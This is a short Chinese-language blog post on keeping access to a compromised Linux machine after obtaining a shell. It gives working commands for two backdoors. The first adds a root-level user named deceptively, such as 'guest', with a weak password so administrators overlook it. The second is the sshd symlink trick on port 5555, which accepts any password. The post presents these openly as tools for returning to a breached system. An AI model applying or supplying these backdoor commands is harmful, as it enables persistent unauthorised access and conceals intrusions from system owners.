Linux下权限维持之后门登陆

简介:

好不容易拿到的 shell 不能白白放弃,加个后门,方便下次再来。

一、添加管理员用户

echo "guest:x:0:0::/:/bin/sh" >> /etc/passwd && echo 'guest:123456'|chpasswd

添加管理员用户这里没什么好说的,需要说的就是尽量使用一些具有迷惑性的名字,比如 guest,sshd,http,openssl 这些具有迷惑性的名字,即使是管理员检查用户的时候也有可能蒙混过关。
有时候不成功可能是因为存在密码策略,设置的密码过于简单了,增强密码的强壮型即可。

二、利用系统特性伪装成一个免密登陆后门

生成软链接后门:

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555

这样直接使用 ssh 工具使用指定的 5555 端口登录,然后密码随便输入一个即可,比如直接使用 Windows 10 下的 CMD 窗口:

ssh root@192.168.80.134 -p 5555

如下图:

密码随便输入即可登录系统,并且是你当前登录的用户的权限。当然也可以使用 XShell 软件登录,不过要注意修改端口,密码依旧是随便输入:

如果目标机器并未开始 5555 端口则需要你手动开启一下端口,但是如果得到的是阿里云这种云服务器的话本地开端口是不行的。

参考引用:

一条命令引发的思考:https://www.cnblogs.com/sevck/p/6495884.html

发表评论

电子邮件地址不会被公开。必填项已用 * 标注